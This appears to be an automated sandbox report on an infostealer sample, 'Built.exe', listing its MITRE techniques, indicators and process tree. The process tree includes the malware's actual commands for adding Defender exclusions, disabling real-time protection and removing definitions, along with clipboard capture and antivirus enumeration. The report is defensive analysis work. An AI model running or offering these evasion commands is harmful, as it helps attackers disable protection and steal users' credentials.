5f2190af1debcee49a6aa8aa05f97492ce9bd4516c2d3cdaff8206f866117cf6

Resubmissions

08-11-2024 00:11

241108-agpcsaznfx 10

08-11-2024 00:07

241108-aeq4la1cla 10

08-11-2024 00:00

241108-aamwda1blg 10

Analysis

max time kernel
34s
max time network
35s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-11-2024 00:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

6.5MB
MD5

8c643afe3eae2bfbc531a83f8c1356c7
SHA1

252cec2459cc65df585c959d84b4f24f2e259af3
SHA256

5f2190af1debcee49a6aa8aa05f97492ce9bd4516c2d3cdaff8206f866117cf6
SHA512

e4d52b7537e0c298256c543f198a25e00b67f5f5bfede069f0d6a41696ee1ec0e1f8eac989f7208429af84854d558dbd31158605e65f891d2435e01990991bb8
SSDEEP

196608:1u4jYIJLc52Nt8cQS/1nXy2IIEZVMwICEc/jf:kutcStz9/1nXy22VJb

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4372	powershell.exe
4504	powershell.exe
3012	powershell.exe
4952	powershell.exe
4448	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0007000000023cb2-21.dat	acprotect
behavioral2/files/0x0007000000023ca5-27.dat	acprotect
behavioral2/files/0x0007000000023cb0-29.dat	acprotect
behavioral2/files/0x0007000000023caf-33.dat	acprotect
behavioral2/files/0x0007000000023cac-47.dat	acprotect
behavioral2/files/0x0007000000023cab-46.dat	acprotect
behavioral2/files/0x0007000000023caa-45.dat	acprotect
behavioral2/files/0x0007000000023ca9-44.dat	acprotect
behavioral2/files/0x0007000000023ca8-43.dat	acprotect
behavioral2/files/0x0007000000023ca7-42.dat	acprotect
behavioral2/files/0x0007000000023ca6-41.dat	acprotect
behavioral2/files/0x0007000000023ca4-40.dat	acprotect
behavioral2/files/0x0007000000023cb7-39.dat	acprotect
behavioral2/files/0x0007000000023cb6-38.dat	acprotect
behavioral2/files/0x0007000000023cb5-37.dat	acprotect
behavioral2/files/0x0007000000023cb1-34.dat	acprotect

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3588	cmd.exe
3260	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3968	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe
2656	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4416	tasklist.exe
4052	tasklist.exe
212	tasklist.exe
2280	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cb2-21.dat	upx
behavioral2/memory/2656-25-0x0000000074E80000-0x0000000075412000-memory.dmp	upx
behavioral2/files/0x0007000000023ca5-27.dat	upx
behavioral2/files/0x0007000000023cb0-29.dat	upx
behavioral2/memory/2656-30-0x0000000074E20000-0x0000000074E42000-memory.dmp	upx
behavioral2/files/0x0007000000023caf-33.dat	upx
behavioral2/memory/2656-48-0x0000000074E10000-0x0000000074E1D000-memory.dmp	upx
behavioral2/files/0x0007000000023cac-47.dat	upx
behavioral2/files/0x0007000000023cab-46.dat	upx
behavioral2/files/0x0007000000023caa-45.dat	upx
behavioral2/files/0x0007000000023ca9-44.dat	upx
behavioral2/files/0x0007000000023ca8-43.dat	upx
behavioral2/files/0x0007000000023ca7-42.dat	upx
behavioral2/files/0x0007000000023ca6-41.dat	upx
behavioral2/files/0x0007000000023ca4-40.dat	upx
behavioral2/files/0x0007000000023cb7-39.dat	upx
behavioral2/files/0x0007000000023cb6-38.dat	upx
behavioral2/files/0x0007000000023cb5-37.dat	upx
behavioral2/files/0x0007000000023cb1-34.dat	upx
behavioral2/memory/2656-54-0x0000000074DE0000-0x0000000074E07000-memory.dmp	upx
behavioral2/memory/2656-56-0x0000000074DC0000-0x0000000074DD8000-memory.dmp	upx
behavioral2/memory/2656-58-0x0000000074DA0000-0x0000000074DBF000-memory.dmp	upx
behavioral2/memory/2656-60-0x0000000074C60000-0x0000000074D9F000-memory.dmp	upx
behavioral2/memory/2656-62-0x0000000074C40000-0x0000000074C55000-memory.dmp	upx
behavioral2/memory/2656-64-0x0000000074BF0000-0x0000000074BFC000-memory.dmp	upx
behavioral2/memory/2656-66-0x0000000074BC0000-0x0000000074BEF000-memory.dmp	upx
behavioral2/memory/2656-71-0x0000000074B10000-0x0000000074BB8000-memory.dmp	upx
behavioral2/memory/2656-70-0x0000000074E80000-0x0000000075412000-memory.dmp	upx
behavioral2/memory/2656-74-0x0000000074E20000-0x0000000074E42000-memory.dmp	upx
behavioral2/memory/2656-73-0x0000000074770000-0x0000000074B04000-memory.dmp	upx
behavioral2/memory/2656-79-0x00000000746E0000-0x00000000746EC000-memory.dmp	upx
behavioral2/memory/2656-78-0x0000000074DE0000-0x0000000074E07000-memory.dmp	upx
behavioral2/memory/2656-76-0x00000000746F0000-0x0000000074701000-memory.dmp	upx
behavioral2/memory/2656-84-0x0000000074DC0000-0x0000000074DD8000-memory.dmp	upx
behavioral2/memory/2656-85-0x0000000074630000-0x00000000746DE000-memory.dmp	upx
behavioral2/memory/2656-110-0x0000000074DA0000-0x0000000074DBF000-memory.dmp	upx
behavioral2/memory/2656-221-0x0000000074C60000-0x0000000074D9F000-memory.dmp	upx
behavioral2/memory/2656-231-0x0000000074C40000-0x0000000074C55000-memory.dmp	upx
behavioral2/memory/2656-273-0x0000000074BC0000-0x0000000074BEF000-memory.dmp	upx
behavioral2/memory/2656-295-0x0000000074B10000-0x0000000074BB8000-memory.dmp	upx
behavioral2/memory/2656-366-0x0000000074770000-0x0000000074B04000-memory.dmp	upx
behavioral2/memory/2656-384-0x0000000074630000-0x00000000746DE000-memory.dmp	upx
behavioral2/memory/2656-376-0x0000000074C60000-0x0000000074D9F000-memory.dmp	upx
behavioral2/memory/2656-370-0x0000000074E80000-0x0000000075412000-memory.dmp	upx
behavioral2/memory/2656-438-0x0000000074E80000-0x0000000075412000-memory.dmp	upx
behavioral2/memory/2656-468-0x0000000074770000-0x0000000074B04000-memory.dmp	upx
behavioral2/memory/2656-478-0x0000000074B10000-0x0000000074BB8000-memory.dmp	upx
behavioral2/memory/2656-482-0x0000000074630000-0x00000000746DE000-memory.dmp	upx
behavioral2/memory/2656-481-0x00000000746E0000-0x00000000746EC000-memory.dmp	upx
behavioral2/memory/2656-480-0x00000000746F0000-0x0000000074701000-memory.dmp	upx
behavioral2/memory/2656-479-0x0000000074E80000-0x0000000075412000-memory.dmp	upx
behavioral2/memory/2656-477-0x0000000074BC0000-0x0000000074BEF000-memory.dmp	upx
behavioral2/memory/2656-476-0x0000000074BF0000-0x0000000074BFC000-memory.dmp	upx
behavioral2/memory/2656-475-0x0000000074C40000-0x0000000074C55000-memory.dmp	upx
behavioral2/memory/2656-474-0x0000000074C60000-0x0000000074D9F000-memory.dmp	upx
behavioral2/memory/2656-473-0x0000000074DA0000-0x0000000074DBF000-memory.dmp	upx
behavioral2/memory/2656-472-0x0000000074DC0000-0x0000000074DD8000-memory.dmp	upx
behavioral2/memory/2656-471-0x0000000074DE0000-0x0000000074E07000-memory.dmp	upx
behavioral2/memory/2656-470-0x0000000074E10000-0x0000000074E1D000-memory.dmp	upx
behavioral2/memory/2656-469-0x0000000074E20000-0x0000000074E42000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getmac.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Built.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Built.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1376	netsh.exe
1796	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1880	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4864	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
4504	powershell.exe
4504	powershell.exe
3012	powershell.exe
3012	powershell.exe
4372	powershell.exe
4372	powershell.exe
4504	powershell.exe
4504	powershell.exe
3260	powershell.exe
3260	powershell.exe
3012	powershell.exe
3012	powershell.exe
4372	powershell.exe
4372	powershell.exe
2892	powershell.exe
2892	powershell.exe
3260	powershell.exe
2892	powershell.exe
4952	powershell.exe
4952	powershell.exe
3460	powershell.exe
3460	powershell.exe
4448	powershell.exe
4448	powershell.exe
5048	powershell.exe
5048	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeIncreaseQuotaPrivilege	3404	WMIC.exe
Token: SeSecurityPrivilege	3404	WMIC.exe
Token: SeTakeOwnershipPrivilege	3404	WMIC.exe
Token: SeLoadDriverPrivilege	3404	WMIC.exe
Token: SeSystemProfilePrivilege	3404	WMIC.exe
Token: SeSystemtimePrivilege	3404	WMIC.exe
Token: SeProfSingleProcessPrivilege	3404	WMIC.exe
Token: SeIncBasePriorityPrivilege	3404	WMIC.exe
Token: SeCreatePagefilePrivilege	3404	WMIC.exe
Token: SeBackupPrivilege	3404	WMIC.exe
Token: SeRestorePrivilege	3404	WMIC.exe
Token: SeShutdownPrivilege	3404	WMIC.exe
Token: SeDebugPrivilege	3404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3404	WMIC.exe
Token: SeRemoteShutdownPrivilege	3404	WMIC.exe
Token: SeUndockPrivilege	3404	WMIC.exe
Token: SeManageVolumePrivilege	3404	WMIC.exe
Token: 33	3404	WMIC.exe
Token: 34	3404	WMIC.exe
Token: 35	3404	WMIC.exe
Token: 36	3404	WMIC.exe
Token: SeDebugPrivilege	4052	tasklist.exe
Token: SeDebugPrivilege	4416	tasklist.exe
Token: SeDebugPrivilege	212	tasklist.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeIncreaseQuotaPrivilege	3404	WMIC.exe
Token: SeSecurityPrivilege	3404	WMIC.exe
Token: SeTakeOwnershipPrivilege	3404	WMIC.exe
Token: SeLoadDriverPrivilege	3404	WMIC.exe
Token: SeSystemProfilePrivilege	3404	WMIC.exe
Token: SeSystemtimePrivilege	3404	WMIC.exe
Token: SeProfSingleProcessPrivilege	3404	WMIC.exe
Token: SeIncBasePriorityPrivilege	3404	WMIC.exe
Token: SeCreatePagefilePrivilege	3404	WMIC.exe
Token: SeBackupPrivilege	3404	WMIC.exe
Token: SeRestorePrivilege	3404	WMIC.exe
Token: SeShutdownPrivilege	3404	WMIC.exe
Token: SeDebugPrivilege	3404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3404	WMIC.exe
Token: SeRemoteShutdownPrivilege	3404	WMIC.exe
Token: SeUndockPrivilege	3404	WMIC.exe
Token: SeManageVolumePrivilege	3404	WMIC.exe
Token: 33	3404	WMIC.exe
Token: 34	3404	WMIC.exe
Token: 35	3404	WMIC.exe
Token: 36	3404	WMIC.exe
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeDebugPrivilege	2280	tasklist.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeIncreaseQuotaPrivilege	1512	WMIC.exe
Token: SeSecurityPrivilege	1512	WMIC.exe
Token: SeTakeOwnershipPrivilege	1512	WMIC.exe
Token: SeLoadDriverPrivilege	1512	WMIC.exe
Token: SeSystemProfilePrivilege	1512	WMIC.exe
Token: SeSystemtimePrivilege	1512	WMIC.exe
Token: SeProfSingleProcessPrivilege	1512	WMIC.exe
Token: SeIncBasePriorityPrivilege	1512	WMIC.exe
Token: SeCreatePagefilePrivilege	1512	WMIC.exe
Token: SeBackupPrivilege	1512	WMIC.exe
Token: SeRestorePrivilege	1512	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5076 wrote to memory of 2656	5076	Built.exe	84
PID 5076 wrote to memory of 2656	5076	Built.exe	84
PID 5076 wrote to memory of 2656	5076	Built.exe	84
PID 2656 wrote to memory of 2336	2656	Built.exe	87
PID 2656 wrote to memory of 2336	2656	Built.exe	87
PID 2656 wrote to memory of 2336	2656	Built.exe	87
PID 2656 wrote to memory of 2588	2656	Built.exe	88
PID 2656 wrote to memory of 2588	2656	Built.exe	88
PID 2656 wrote to memory of 2588	2656	Built.exe	88
PID 2656 wrote to memory of 3896	2656	Built.exe	91
PID 2656 wrote to memory of 3896	2656	Built.exe	91
PID 2656 wrote to memory of 3896	2656	Built.exe	91
PID 2336 wrote to memory of 4372	2336	cmd.exe	93
PID 2336 wrote to memory of 4372	2336	cmd.exe	93
PID 2336 wrote to memory of 4372	2336	cmd.exe	93
PID 2588 wrote to memory of 3012	2588	cmd.exe	94
PID 2588 wrote to memory of 3012	2588	cmd.exe	94
PID 2588 wrote to memory of 3012	2588	cmd.exe	94
PID 3896 wrote to memory of 4504	3896	cmd.exe	95
PID 3896 wrote to memory of 4504	3896	cmd.exe	95
PID 3896 wrote to memory of 4504	3896	cmd.exe	95
PID 2656 wrote to memory of 372	2656	Built.exe	96
PID 2656 wrote to memory of 372	2656	Built.exe	96
PID 2656 wrote to memory of 372	2656	Built.exe	96
PID 2656 wrote to memory of 1572	2656	Built.exe	97
PID 2656 wrote to memory of 1572	2656	Built.exe	97
PID 2656 wrote to memory of 1572	2656	Built.exe	97
PID 2656 wrote to memory of 3796	2656	Built.exe	100
PID 2656 wrote to memory of 3796	2656	Built.exe	100
PID 2656 wrote to memory of 3796	2656	Built.exe	100
PID 2656 wrote to memory of 3588	2656	Built.exe	101
PID 2656 wrote to memory of 3588	2656	Built.exe	101
PID 2656 wrote to memory of 3588	2656	Built.exe	101
PID 2656 wrote to memory of 3812	2656	Built.exe	104
PID 2656 wrote to memory of 3812	2656	Built.exe	104
PID 2656 wrote to memory of 3812	2656	Built.exe	104
PID 2656 wrote to memory of 4080	2656	Built.exe	106
PID 2656 wrote to memory of 4080	2656	Built.exe	106
PID 2656 wrote to memory of 4080	2656	Built.exe	106
PID 2656 wrote to memory of 1796	2656	Built.exe	107
PID 2656 wrote to memory of 1796	2656	Built.exe	107
PID 2656 wrote to memory of 1796	2656	Built.exe	107
PID 2656 wrote to memory of 4464	2656	Built.exe	108
PID 2656 wrote to memory of 4464	2656	Built.exe	108
PID 2656 wrote to memory of 4464	2656	Built.exe	108
PID 2656 wrote to memory of 4060	2656	Built.exe	112
PID 2656 wrote to memory of 4060	2656	Built.exe	112
PID 2656 wrote to memory of 4060	2656	Built.exe	112
PID 2656 wrote to memory of 3932	2656	Built.exe	111
PID 2656 wrote to memory of 3932	2656	Built.exe	111
PID 2656 wrote to memory of 3932	2656	Built.exe	111
PID 1572 wrote to memory of 4416	1572	cmd.exe	114
PID 1572 wrote to memory of 4416	1572	cmd.exe	114
PID 1572 wrote to memory of 4416	1572	cmd.exe	114
PID 372 wrote to memory of 4052	372	cmd.exe	117
PID 372 wrote to memory of 4052	372	cmd.exe	117
PID 372 wrote to memory of 4052	372	cmd.exe	117
PID 3588 wrote to memory of 3260	3588	cmd.exe	118
PID 3588 wrote to memory of 3260	3588	cmd.exe	118
PID 3588 wrote to memory of 3260	3588	cmd.exe	118
PID 3796 wrote to memory of 3404	3796	cmd.exe	119
PID 3796 wrote to memory of 3404	3796	cmd.exe	119
PID 3796 wrote to memory of 3404	3796	cmd.exe	119
PID 3812 wrote to memory of 212	3812	cmd.exe	121

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3020	attrib.exe
1676	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5076
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2336
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2588
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎‏.scr'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3896
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎‏.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:372
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1572
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3796
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3588
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3812
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
